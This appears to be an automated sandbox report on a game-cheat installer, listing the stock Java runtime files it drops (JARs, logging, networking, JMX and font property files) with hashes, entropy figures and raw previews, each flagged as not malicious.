                                Preview:PK...........H................META-INF/....PK...........H.E..Z...g.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%-..x...R.KRSt.*A.-...M.t....4....sR......K..5y.x..PK...........H................javafx/PK...........H................javafx/embed/PK...........H................javafx/embed/swt/PK...........Hj...........%...javafx/embed/swt/CustomTransfer.class.T[S.F.=.MX(..!............8..`h.d....." yd..........4....%..k.N..ka.83..[.....|+...........#.OD..1...1.1.S1....*>..I..TL.....Y..*.S.q.-KAja..6.M.Y7V|.v...e............+...u...Z.....Z......k...O.v.....x..f...M.v...~I....j.N.(.R.... ..n.%).l:.N..,J...-.%.os:.v.K..V.._p.u.l..e...S5...^.....3+.Yy.h.RtGR..y.)..~...g..R.;5K...{.G.*..X.JP....D....8..[3.g...'d.e#Z.|c.j.t..F.w..t.W.j.,K[q.^..E.=M.a..6d.Z..yV.....=..........:.WG.............RA.<......qT...,*.=.....t\......(aI.2.....!..Jp.,..<.x..n.S....N.K.e.W....N.-..`....hmQ.E.fGE..$..n...4I{.......l_.)......?.Z>...t

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\jsse.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):633957
                                Entropy (8bit):6.018176262975427
                                Encrypted:false
                                SSDEEP:6144:ABoQeW0HKwYGORU+ehqEmke1WEAibVR0GPs4j8GgflXhuuMAjYDTj:Uo40WGdNmpb3DP75
                                MD5:FD1434C81219C385F30B07E33CEF9F30
                                SHA1:0B5EE897864C8605EF69F66DFE1E15729CFCBC59
                                SHA-256:BC3A736E08E68ACE28C68B0621DCCFB76C1063BD28D7BD8FCE7B20E7B7526CC5
                                SHA-512:9A778A3843744F1FABAD960AA22880D37C30B1CAB29E123170D853C9469DC54A81E81A9070E1DE1BF63BA527C332BB2B1F1D872907F3BDCE33A6898A02FEF22D
                                Malicious:false
                                Preview:PK........u..H................META-INF/....PK........u..H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........H....E...E...+...com/sun/net/ssl/internal/ssl/Provider.class.......4...............................serialVersionUID...J...ConstantValue.,..c".J-...<init>...()V...Code...LineNumberTable...(Ljava/security/Provider;)V...(Ljava/lang/String;)V...isFIPS...()Z...install...SourceFile...Provider.java......................%com/sun/net/ssl/internal/ssl/Provider...sun/security/ssl/SunJSSE.1.......................................!........*...................)...*............."........*+......................./............."........*+...................3...4.)........................

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\jvm.hprof.txt (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4312
                                Entropy (8bit):4.756104846669624
                                Encrypted:false
                                SSDEEP:96:6VprYJmprYJD9Y3t3qFKPG7hLxVJgdTsfbFfcwQoPv:6HrsursD9Y3t36KPG7HyoBQoX
                                MD5:AD91D69A4129D31D72FBE288FF967943
                                SHA1:CB510AFCDBECEA3538C3F841C0440194573DBB65
                                SHA-256:235A50D958FAEDDE808D071705A6D603F97611F568EEC40D7444984B984A4B18
                                SHA-512:600BEE4676D26E2CE5B9171582540021509A4D7888C9C7BADC14F0FAD07007E4CE2B4C007A8EB15BD0D977722B8B34442012EA972FFBD72797475A56CDFD86EE
                                Malicious:false
                                Preview:Copyright (c) 2003, 2005, Oracle and/or its affiliates. All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:.... - Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer..... - Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution..... - Neither the name of Oracle nor the names of its.. contributors may be used to endorse or promote products derived.. from this software without specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS..IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,..THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR..PURP

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\logging.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2514
                                Entropy (8bit):4.525846572478507
                                Encrypted:false
                                SSDEEP:48:/GXieQT8cg6ZGBjn4stbaWUwO61xFMxO9:OXieW8nBjn4x613Mw9
                                MD5:0AA5D5EFDB4F2B92BEBBEB4160AA808B
                                SHA1:C6F1B311A4D0790AF8C16C1CA9599D043BA99E90
                                SHA-256:A3148336160EA7EF451052D1F435F7C9D96EEB738105AC730358EDADA5BD45A2
                                SHA-512:A52C2B784CF0B01A2AF3066F4BB8E7FD890A86CFD82359A22266341942A25333D4C63BA2C02AA43ADE872357FC9C8BBC60D311B2AF2AD2634D60377A2294AFDD
                                Malicious:false
                                Preview:############################################################..# .Default Logging Configuration File..#..# You can use a different file by specifying a filename..# with the java.util.logging.config.file system property. ..# For example java -Djava.util.logging.config.file=myfile..############################################################....############################################################..# .Global properties..############################################################....# "handlers" specifies a comma separated list of log Handler ..# classes. These handlers will be installed during VM startup...# Note that these classes must be on the system classpath...# By default we only configure a ConsoleHandler, which will only..# show messages at the INFO and above levels...handlers= java.util.logging.ConsoleHandler....# To also add the FileHandler, use the following line instead...#handlers= java.util.logging.FileHandler, java.util.logging.ConsoleHandler....# Default global

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\management-agent.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):381
                                Entropy (8bit):4.99308306420453
                                Encrypted:false
                                SSDEEP:6:5ji0B4r/Rjiszbdy/oocj+sqX2K5YZ5/CUMQxxi6m4xijgxmzbdGh/4:5ji0GJjiIq1cCvXPA/CUMQxoeocx2K/4
                                MD5:B608D45DCDD7A4CAD6A63A89A002F683
                                SHA1:F6E3BB7050C3B1A3BED9B33122C4A98E6B9A810D
                                SHA-256:52CA96531445B437DCA524CB3714FCD8D70221D37A6B9C80F816713C3040DD0A
                                SHA-512:407E7CA807826F0E41B085BCA0F54F0134E3B9AC16FA5480EDE02774067DAD46AA07D225BA2981DEC2A7297EA57721EAB8C54E8BED83D352EC6C00ABFDBBF626
                                Malicious:false
                                Preview:PK........t..H................META-INF/......PK..............PK........t..H................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u.........+h..%&.*8.....%...k.r9....:.$..[).....&.%....E..r.\.E....y...r..PK.....k.......PK..........t..H..............................META-INF/....PK..........t..H...k.....................=...META-INF/MANIFEST.MFPK..........}.........

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\management\is-5N31F.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3486
                                Entropy (8bit):4.4357861198752975
                                Encrypted:false
                                SSDEEP:48:MlXHR6+76EX0o8KA0Esns+ek2OrRC9AUE4T7AKQi2r8BKS3GpPsDu0cpUxJAJKk3:M9HRb7l0FAEsnJKmS32X00h
                                MD5:9D9EC1BB9E357BBFB72B077E4AF5F63F
                                SHA1:6484B03DBE9687216429D3A6F916773C060E15CE
                                SHA-256:8B02A29BC61B0F7203DF7CA94140F80D2C6A1138064E0441DFD621CF243A0339
                                SHA-512:5FE39BBFCA806CE45871A6223D80FA731EFAA5D31C3B97EE055AB77EAF3833342945F39E9858335D9DD358B4B7F984FFADE741452E19B60B8E510AA74AC02C00
                                Malicious:false
                                Preview:# ----------------------------------------------------------------------..# Template for SNMP Access Control List File..#..# o Copy this template to snmp.acl..# o Set access control for SNMP support..# o Change the permission of snmp.acl to be read-only..# by the owner...#..# See below for the location of snmp.acl file...# ----------------------------------------------------------------------....############################################################..# SNMP Access Control List File ..############################################################..#..# Default location of this file is $JRE/lib/management/snmp.acl...# You can specify an alternate location by specifying a property in ..# the management config file $JRE/lib/management/management.properties..# or by specifying a system property (See that file for details)...#......##############################################################..# File permissions of the snmp.acl file..######################

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\management\is-JTQUT.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4077
                                Entropy (8bit):4.472483528668558
                                Encrypted:false
                                SSDEEP:96:eii7cSoFKfgCe/D4dtQN+wvohSoVGPbPvRZUIpeDMy:eiiISokfXeEk+wQhnMPbnRZR7y
                                MD5:41B36D832BE39A3CF0F3D7760E55FDCB
                                SHA1:E706E9BE75604A13DFCC5A96B1720A544D76348B
                                SHA-256:71A930CBE577CBABB4269650C98D227F739E0D4B9C0B44830DD3D52F5015BE1F
                                SHA-512:41E6B8639C1CEB3D09D2FDEEEBA89FFA17C4ED8B1AD0DF1E5AB46C4BF178688D5504DC5A3C854226F7DA23DFA0EDAB0D035D6B56495829F43AAA2A7BABEC4273
                                Malicious:false
                                Preview:######################################################################..# Default Access Control File for Remote JMX(TM) Monitoring..######################################################################..#..# Access control file for Remote JMX API access to monitoring...# This file defines the allowed access for different roles. The..# password file (jmxremote.password by default) defines the roles and their..# passwords. To be functional, a role must have an entry in..# both the password and the access files...#..# The default location of this file is $JRE/lib/management/jmxremote.access..# You can specify an alternate location by specifying a property in ..# the management config file $JRE/lib/management/management.properties..# (See that file for details)..#..# The file format for password and access files is syntactically the same..# as the Properties file format. The syntax is described in the Javadoc..# for java.util.Properties.load...# A typical access file has multiple

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\management\is-NQ6DF.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2920
                                Entropy (8bit):4.545881645777106
                                Encrypted:false
                                SSDEEP:48:MRSflLrmpop7JN/PgP8KAeoYsnZyhNMVJKWfVStEqwP0pba:Mkv7ngUZYsnRnfYdhE
                                MD5:5DD28AAF5A06C946DF7B223F33482FDF
                                SHA1:D09118D402CA3BA625B165ECACE863466D7F4CE9
                                SHA-256:24674176A4C0E5EEFB9285691764EA06585D90BBDAF5BF40C4220DE7CA3E3175
                                SHA-512:13C6F37E969A5AECE2B2F938FA8EBF6A72C0C173678A026E77C35871E4AE89404585FB1A3516AE2CA336FC47EAB1F3DD2009123ADBA9C437CD76BA654401CBDF
                                Malicious:false
                                Preview:# ----------------------------------------------------------------------..# Template for jmxremote.password..#..# o Copy this template to jmxremote.password..# o Set the user/password entries in jmxremote.password..# o Change the permission of jmxremote.password to read-only..# by the owner...#..# See below for the location of jmxremote.password file...# ----------------------------------------------------------------------....##############################################################..# Password File for Remote JMX Monitoring..##############################################################..#..# Password file for Remote JMX API access to monitoring. This..# file defines the different roles and their passwords. The access..# control file (jmxremote.access by default) defines the allowed..# access for each role. To be functional, a role must have an entry..# in both the password and the access files...#..# Default location of this file is $JRE/lib/management/jmx

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\management\is-VF2AJ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):14415
                                Entropy (8bit):4.623139916889837
                                Encrypted:false
                                SSDEEP:192:PLrOKIXaIr8Jzc90OEqfmdbHHHN6pDIdpgzri:PLrOKIXaIgYiOE0mdbHHHNGD4p0+
                                MD5:054E093240388F0322604619EF643F18
                                SHA1:6E110C2A5D813013E9C57700BE8B0D17896E950C
                                SHA-256:BF41D73EAB0DA8222FE24255E1BBF68327FB02B1A4F1E7A81B9C7B539033FFB2
                                SHA-512:BD60C6271CDEFFFF4563E6E2CF97C176D86F160092D1FFCBE7EEFE714BA75DDC5FB4E848A5FDBE7A1D1510720D92AF6A176A76DE2CC599F27E4BEAE8E692C5D3
                                Malicious:false
                                Preview:#####################################################################..#.Default Configuration File for Java Platform Management..#####################################################################..#..# The Management Configuration file (in java.util.Properties format)..# will be read if one of the following system properties is set:..# -Dcom.sun.management.jmxremote.port=<port-number>..# or -Dcom.sun.management.snmp.port=<port-number>..# or -Dcom.sun.management.config.file=<this-file>..#..# The default Management Configuration file is:..#..# $JRE/lib/management/management.properties..#..# Another location for the Management Configuration File can be specified..# by the following property on the Java command line:..#..# -Dcom.sun.management.config.file=<this-file>..#..# If -Dcom.sun.management.config.file=<this-file> is set, the port..# number for the management agent can be specified in the config file..# using the following lines:..#..# ################ Management Agen

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\management\jmxremote.access (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4077
                                Entropy (8bit):4.472483528668558
                                Encrypted:false
                                SSDEEP:96:eii7cSoFKfgCe/D4dtQN+wvohSoVGPbPvRZUIpeDMy:eiiISokfXeEk+wQhnMPbnRZR7y
                                MD5:41B36D832BE39A3CF0F3D7760E55FDCB
                                SHA1:E706E9BE75604A13DFCC5A96B1720A544D76348B
                                SHA-256:71A930CBE577CBABB4269650C98D227F739E0D4B9C0B44830DD3D52F5015BE1F
                                SHA-512:41E6B8639C1CEB3D09D2FDEEEBA89FFA17C4ED8B1AD0DF1E5AB46C4BF178688D5504DC5A3C854226F7DA23DFA0EDAB0D035D6B56495829F43AAA2A7BABEC4273
                                Malicious:false
                                Preview:######################################################################..# Default Access Control File for Remote JMX(TM) Monitoring..######################################################################..#..# Access control file for Remote JMX API access to monitoring...# This file defines the allowed access for different roles. The..# password file (jmxremote.password by default) defines the roles and their..# passwords. To be functional, a role must have an entry in..# both the password and the access files...#..# The default location of this file is $JRE/lib/management/jmxremote.access..# You can specify an alternate location by specifying a property in ..# the management config file $JRE/lib/management/management.properties..# (See that file for details)..#..# The file format for password and access files is syntactically the same..# as the Properties file format. The syntax is described in the Javadoc..# for java.util.Properties.load...# A typical access file has multiple

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\management\jmxremote.password.template (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2920
                                Entropy (8bit):4.545881645777106
                                Encrypted:false
                                SSDEEP:48:MRSflLrmpop7JN/PgP8KAeoYsnZyhNMVJKWfVStEqwP0pba:Mkv7ngUZYsnRnfYdhE
                                MD5:5DD28AAF5A06C946DF7B223F33482FDF
                                SHA1:D09118D402CA3BA625B165ECACE863466D7F4CE9
                                SHA-256:24674176A4C0E5EEFB9285691764EA06585D90BBDAF5BF40C4220DE7CA3E3175
                                SHA-512:13C6F37E969A5AECE2B2F938FA8EBF6A72C0C173678A026E77C35871E4AE89404585FB1A3516AE2CA336FC47EAB1F3DD2009123ADBA9C437CD76BA654401CBDF
                                Malicious:false
                                Preview:# ----------------------------------------------------------------------..# Template for jmxremote.password..#..# o Copy this template to jmxremote.password..# o Set the user/password entries in jmxremote.password..# o Change the permission of jmxremote.password to read-only..# by the owner...#..# See below for the location of jmxremote.password file...# ----------------------------------------------------------------------....##############################################################..# Password File for Remote JMX Monitoring..##############################################################..#..# Password file for Remote JMX API access to monitoring. This..# file defines the different roles and their passwords. The access..# control file (jmxremote.access by default) defines the allowed..# access for each role. To be functional, a role must have an entry..# in both the password and the access files...#..# Default location of this file is $JRE/lib/management/jmx

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\management\management.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):14415
                                Entropy (8bit):4.623139916889837
                                Encrypted:false
                                SSDEEP:192:PLrOKIXaIr8Jzc90OEqfmdbHHHN6pDIdpgzri:PLrOKIXaIgYiOE0mdbHHHNGD4p0+
                                MD5:054E093240388F0322604619EF643F18
                                SHA1:6E110C2A5D813013E9C57700BE8B0D17896E950C
                                SHA-256:BF41D73EAB0DA8222FE24255E1BBF68327FB02B1A4F1E7A81B9C7B539033FFB2
                                SHA-512:BD60C6271CDEFFFF4563E6E2CF97C176D86F160092D1FFCBE7EEFE714BA75DDC5FB4E848A5FDBE7A1D1510720D92AF6A176A76DE2CC599F27E4BEAE8E692C5D3
                                Malicious:false
                                Preview:#####################################################################..#.Default Configuration File for Java Platform Management..#####################################################################..#..# The Management Configuration file (in java.util.Properties format)..# will be read if one of the following system properties is set:..# -Dcom.sun.management.jmxremote.port=<port-number>..# or -Dcom.sun.management.snmp.port=<port-number>..# or -Dcom.sun.management.config.file=<this-file>..#..# The default Management Configuration file is:..#..# $JRE/lib/management/management.properties..#..# Another location for the Management Configuration File can be specified..# by the following property on the Java command line:..#..# -Dcom.sun.management.config.file=<this-file>..#..# If -Dcom.sun.management.config.file=<this-file> is set, the port..# number for the management agent can be specified in the config file..# using the following lines:..#..# ################ Management Agen

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\management\snmp.acl.template (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3486
                                Entropy (8bit):4.4357861198752975
                                Encrypted:false
                                SSDEEP:48:MlXHR6+76EX0o8KA0Esns+ek2OrRC9AUE4T7AKQi2r8BKS3GpPsDu0cpUxJAJKk3:M9HRb7l0FAEsnJKmS32X00h
                                MD5:9D9EC1BB9E357BBFB72B077E4AF5F63F
                                SHA1:6484B03DBE9687216429D3A6F916773C060E15CE
                                SHA-256:8B02A29BC61B0F7203DF7CA94140F80D2C6A1138064E0441DFD621CF243A0339
                                SHA-512:5FE39BBFCA806CE45871A6223D80FA731EFAA5D31C3B97EE055AB77EAF3833342945F39E9858335D9DD358B4B7F984FFADE741452E19B60B8E510AA74AC02C00
                                Malicious:false
                                Preview:# ----------------------------------------------------------------------..# Template for SNMP Access Control List File..#..# o Copy this template to snmp.acl..# o Set access control for SNMP support..# o Change the permission of snmp.acl to be read-only..# by the owner...#..# See below for the location of snmp.acl file...# ----------------------------------------------------------------------....############################################################..# SNMP Access Control List File ..############################################################..#..# Default location of this file is $JRE/lib/management/snmp.acl...# You can specify an alternate location by specifying a property in ..# the management config file $JRE/lib/management/management.properties..# or by specifying a system property (See that file for details)...#......##############################################################..# File permissions of the snmp.acl file..######################

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\meta-index (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2126
                                Entropy (8bit):4.970874214349507
                                Encrypted:false
                                SSDEEP:48:EE796OfeCiuG2M5tP5iMmC5KOAY2HQii+r4IzteKk:EnEiuGJbP5lmC5KOA3HQii+EIz8Kk
                                MD5:91AA6EA7320140F30379F758D626E59D
                                SHA1:3BE2FEBE28723B1033CCDAA110EAF59BBD6D1F96
                                SHA-256:4AF21954CDF398D1EAE795B6886CA2581DAC9F2F1D41C98C6ED9B5DBC3E3C1D4
                                SHA-512:03428803F1D644D89EB4C0DCBDEA93ACAAC366D35FC1356CCABF83473F4FEF7924EDB771E44C721103CEC22D94A179F092D1BFD1C0A62130F076EB82A826D7CB
                                Malicious:false
                                Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..# charsets.jar..sun/nio..sun/awt..# jce.jar..javax/crypto..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# jfr.jar..oracle/jrockit/..jdk/jfr..com/oracle/jrockit/..! jsse.jar..sun/security..com/sun/net/..! management-agent.jar..@ resources.jar..com/sun/java/util/jar/pack/..META-INF/services/sun.util.spi.XmlPropertiesProvider..META-INF/services/javax.print.PrintServiceLookup..com/sun/corba/..META-INF/services/javax.sound.midi.spi.SoundbankReader..sun/print..META-INF/services/javax.sound.midi.spi.MidiFileReader..META-INF/services/sun.java2d.cmm.CMMServiceProvider..javax/swing..META-INF/services/javax.sound.sampled.spi.AudioFileReader..META-INF/services/javax.sound.midi.spi.MidiDeviceProvider..sun/net..META-INF/services/javax.sound.sampled.spi.AudioFileWriter..com/sun/imageio/..META-INF/services/sun.java2d.pipe.Ren

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\net.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3144
                                Entropy (8bit):4.858724831876285
                                Encrypted:false
                                SSDEEP:48:VBnTRxiW1nTbXMROXX6zcjd6vEzcoZDTzcj8L0zccfbb6wB:VBnvisPMQ6z+zPVzv0zVfvT
                                MD5:1CBB261944925044B1EE119DC0563D05
                                SHA1:05F2F63047F4D82F37DFA59153309E53CAA4675C
                                SHA-256:5BAF75BDD504B2C80FF5B98F929A16B04E9CB06AA8AAE30C144B5B40FEBE0906
                                SHA-512:C964A92BE25BACF11D20B61365930CAB28517D164D9AE4997651E2B715AA65628E45FA4BD236CCD507C65E5D85A470FD165F207F446186D22AE4BD46A04006E6
                                Malicious:false
                                Preview:############################################################..# .Default Networking Configuration File..#..# This file may contain default values for the networking system properties...# These values are only used when the system properties are not specified..# on the command line or set programatically...# For now, only the various proxy settings can be configured here...############################################################....# Whether or not the DefaultProxySelector will default to System Proxy..# settings when they do exist...# Set it to 'true' to enable this feature and check for platform..# specific proxy settings..# Note that the system properties that do explicitely set proxies..# (like http.proxyHost) do take precedence over the system settings..# even if java.net.useSystemProxies is set to true... ..java.net.useSystemProxies=false....#------------------------------------------------------------------------..# Proxy configuration for the various protocol handlers...# D

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\plugin.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):1012097
                                Entropy (8bit):7.896417877823185
                                Encrypted:false
                                SSDEEP:24576:q7jNpf26MPAMSL/wxSz2ijt2eejo+oV3vv:6NVZEaL4xSljt2eHNV3
                                MD5:54EF6C22FAAAE5850091031763078D37
                                SHA1:11D40B78BB606E245CB5E17C6DDB08193A34B40E
                                SHA-256:654B033B1DC315EB9806F0D35ABAF3F25064AC806292ACB2BD818F6B2DF2AD07
                                SHA-512:10998B6508D5571E1ECE2001C6E561169D3DBD7580A3DE439067D1195FBE85E6BD1729A0874E306234391AF963E1B062050276E1AC0E9C9FA289711738B41B31
                                Malicious:false
                                Preview:PK........!..H................META-INF/....PK........ ..H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/sun/PK...........H................com/sun/deploy/PK...........H................com/sun/deploy/uitoolkit/PK...........H................com/sun/deploy/uitoolkit/impl/PK........!..H............"...com/sun/deploy/uitoolkit/impl/awt/PK...........H............#...com/sun/deploy/uitoolkit/impl/text/PK...........H................com/sun/deploy/uitoolkit/ui/PK...........H................com/sun/java/PK...........H................com/sun/java/browser/PK...........H................com/sun/java/browser/plugin2/PK...........H............)...com/sun/java/browser/plugin2/liveconnect/PK...........H............,...com/sun/java/browser/plugin2/liveconnect/v1/PK...........H................netscape/PK...........H................netscape/javascript/PK.........

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\psfont.properties.ja (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2915
                                Entropy (8bit):5.2172692442941075
                                Encrypted:false
                                SSDEEP:48:GgQv18IsTJvuUdEt6u7KeblbhGwQEvzZIE+i+WEi+Iq4fNSg2kv:Gb6Xha1hFGwQEvdh+5g2kv
                                MD5:A38587427E422D55B012FA3E5C9436D2
                                SHA1:7BD1B81B39DA78124BE045507E0681E860921DBB
                                SHA-256:D2C47DE948033ED836B375CCD518CF55333FE11C4CED56BC1CE2FF62114CF546
                                SHA-512:EA6CA975E9308ED2B3BBCCE91EE61142DAB0067CE8F17CB469929F6136E6B4A968BAC838141D8B38866F9EF5E15E156400859CCCC84FB114214E19556F0DC636
                                Malicious:false
                                Preview:#..#..# Copyright (c) 1996, 2000, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.Japanese PostScript printer property file..#..font.num=16..#..serif=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..monospaced=monospaced..courier=monospaced..dialog=sansserif..dialoginput=monospaced..#..serif.latin1.plain=Times-Roman..serif.latin1.italic=Times-Italic..serif.latin1.bolditalic=Times-BoldItalic..serif.latin1.bold=Times-Bold..#..sansserif.latin1.plain=Helvetica..sansserif.latin1.italic=Helvetica-Oblique..sansserif.latin1.bolditalic=Helvetica-BoldOblique..sansserif.latin1.bold=Helvetica-Bold..#..monospaced.latin1.plain=Courier..monospaced.latin1.italic=Courier-Oblique..monospaced.latin1.bolditalic=Courier-BoldOblique..monospaced.latin1.bold=Courier-Bold..#..serif.x11jis0208.plain=Ryumin-Light-H..serif.x11jis0208.italic=Ryumin-Light-H

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\psfontj2d.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):10716
                                Entropy (8bit):5.016037435830914
                                Encrypted:false
                                SSDEEP:192:Jp22HdiEUEdWUcPeJ7fbdHmcbiLMWNDyZcy57ha1xh3qvfRdIdyJkW:u2HdiEUEdGY1gbD9TKdIdyJkW
                                MD5:66B3E6770C291FE8CD3240FFBB00DC47
                                SHA1:88CE9D723A2D4A07FD2032A8B4A742FE323EEC8F
                                SHA-256:7EA6E05D3B8B51D03C3D6548E709C220541DF0F1AEE2E69B9101C9F051F7C17A
                                SHA-512:D1B99AA011568AFFA415758C986B427588AE87FE5EB7FC52D519F7167AD46BBFF8B62799F14D8DBC7C55DEB6FF7259445D6E8882CC781D61206ED1B79B688745
                                Malicious:false
                                Preview:#..#..# Copyright (c) 1999, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.PostScript printer property file for Java 2D printing...#..# WARNING: This is an internal implementation file, not a public file...# Any customisation or reliance on the existence of this file and its..# contents or syntax is discouraged and unsupported...# It may be incompatibly changed or removed without any notice...#..#..font.num=35..#..# Legacy logical font family names and logical font aliases should all..# map to the primary logical font names...#..serif=serif..times=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..dialog=sansserif..dialoginput=monospaced..monospaced=monospaced..courier=monospaced..#..# Next, physical fonts which can be safely mapped to standard postscript fonts..# These keys generally map to a value which is the same as the key, so

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\resources.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3490933
                                Entropy (8bit):6.067002853185717
                                Encrypted:false
                                SSDEEP:49152:WX4zfeUcKDQ1toKXiO3fLxqhH3YRazQwIK7XgnyRMvMtMm55HopLKbtJzUkMkOBV:GL
                                MD5:9A084B91667E7437574236CD27B7C688
                                SHA1:D8926CC4AA12D6FE9ABE64C8C3CB8BC0F594C5B1
                                SHA-256:A1366A75454FC0F1CA5A14EA03B4927BB8584D6D5B402DFA453122AE16DBF22D
                                SHA-512:D603AA29E1F6EEFFF4B15C7EBC8A0FA18E090D2E1147D56FD80581C7404EE1CB9D6972FCF2BD0CB24926B3AF4DFC5BE9BCE1FE018681F22A38ADAA278BF22D73
                                Malicious:false
